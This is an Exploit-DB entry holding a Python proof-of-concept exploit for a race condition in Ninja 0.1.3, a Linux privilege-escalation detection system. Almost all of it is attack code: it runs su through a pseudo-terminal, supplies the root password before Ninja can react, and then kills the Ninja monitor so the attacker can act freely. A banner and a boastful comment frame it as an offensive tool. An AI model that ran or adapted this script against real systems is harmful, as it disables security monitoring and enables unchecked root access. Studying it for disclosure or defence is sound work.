Ninja Privilege Escalation Detection and Prevention System 0.1.3 - Race Condition Privilege Escalation

EDB-ID:

36855

CVE:



Platform:

Linux

Published:

2015-04-29

#[Title] Ninja privilege escalation detection and prevention system race condition
#[Author] Ben 'highjack' Sheppard
#[URL] http://highjack.github.io/
#[Description] There is a small delay between the time of execution of a command and the time privelege escalation is detected.
#It is therefore possible to use a pty to run a command such as su and provide the password faster than it can be detected.
#The following PoC becomes root using su and issues killall -9 ninja. The attacker can then run any commands that they wish.
#[Software Link] http://forkbomb.org/ninja/
#[Date] 29/04/2015
#[Version] 0.1.3
#[Tested on] Kali Linux
#[Demo] https://www.youtube.com/watch?v=P8VJCUUJPLg

#See me hitting every open port, 'cause im banging on their system while I'm staying out of the court
#https://www.youtube.com/watch?v=eA136fOsSeQ

import pty, os, sys, subprocess
pid, fd = pty.fork()

#begin config
user = "root"
password  = "mypassword" #change this :)
command = "killall -9 ninja"
#end config


def usage():
	print """
@@@  @@@  @@@   @@@@@@@@  @@@  @@@       @@@   @@@@@@    @@@@@@@  @@@  @@@  
@@@  @@@  @@@  @@@@@@@@@  @@@  @@@       @@@  @@@@@@@@  @@@@@@@@  @@@  @@@  
@@!  @@@  @@!  !@@        @@!  @@@       @@!  @@!  @@@  !@@       @@!  !@@  
!@!  @!@  !@!  !@!        !@!  @!@       !@!  !@!  @!@  !@!       !@!  @!!  
@!@!@!@!  !!@  !@! @!@!@  @!@!@!@!       !!@  @!@!@!@!  !@!       @!@@!@!   
!!!@!!!!  !!!  !!! !!@!!  !!!@!!!!       !!!  !!!@!!!!  !!!       !!@!!!    
!!:  !!!  !!:  :!!   !!:  !!:  !!!       !!:  !!:  !!!  :!!       !!: :!!   
:!:  !:!  :!:  :!:   !::  :!:  !:!  !!:  :!:  :!:  !:!  :!:       :!:  !:!  
::   :::   ::   ::: ::::  ::   :::  ::: : ::  ::   :::   ::: :::   ::  :::  
 :   : :  :     :: :: :    :   : :   : :::     :   : :   :: :: :   :   ::: 
 
[Title] Ninja privilege escalation detection and prevention system 0.1.3 race condition
[Author] Ben 'highjack' Sheppard
[URL] http://highjack.github.io/
 
[Description] There is a small delay between the time of execution of a command and the time privelege escalation is detected.
It is therefore possible to use a pty to run a command such as su and provide the password faster than it can be detected.
The following PoC becomes root using su and issues killall -9 ninja. The attacker can then run any commands that they wish.
 """
 

executions = 0
def check_procs():
	p1 = subprocess.Popen(["ps", "aux"], stdout=subprocess.PIPE)
	p2 = subprocess.Popen(["grep", "root"],  stdin=p1.stdout,  stdout=subprocess.PIPE)
	p3 = subprocess.Popen(["grep", "/sbin/ninja"], stdin=p2.stdout, stdout=subprocess.PIPE)
	output = p3.communicate()[0]
	if output != "":
		if executions != 0:
			sys.exit(0)
		return True
	else:
		return False

def kill_ninja():
	if pid == 0:
		os.execvp("su", ["su", user, "-c", command])
	elif pid > 0:
		try:
			os.read(fd, 1024)
			os.write(fd, password + "\n")
			os.read(fd,1024)
			os.wait()
			os.close(fd)
		except:
			usage()
			print "[+] Ninja is terminated"
			sys.exit(0)
			

while True:
	kill_ninja()
	if (check_procs == True):
		executions = executions + 1
		kill_ninja()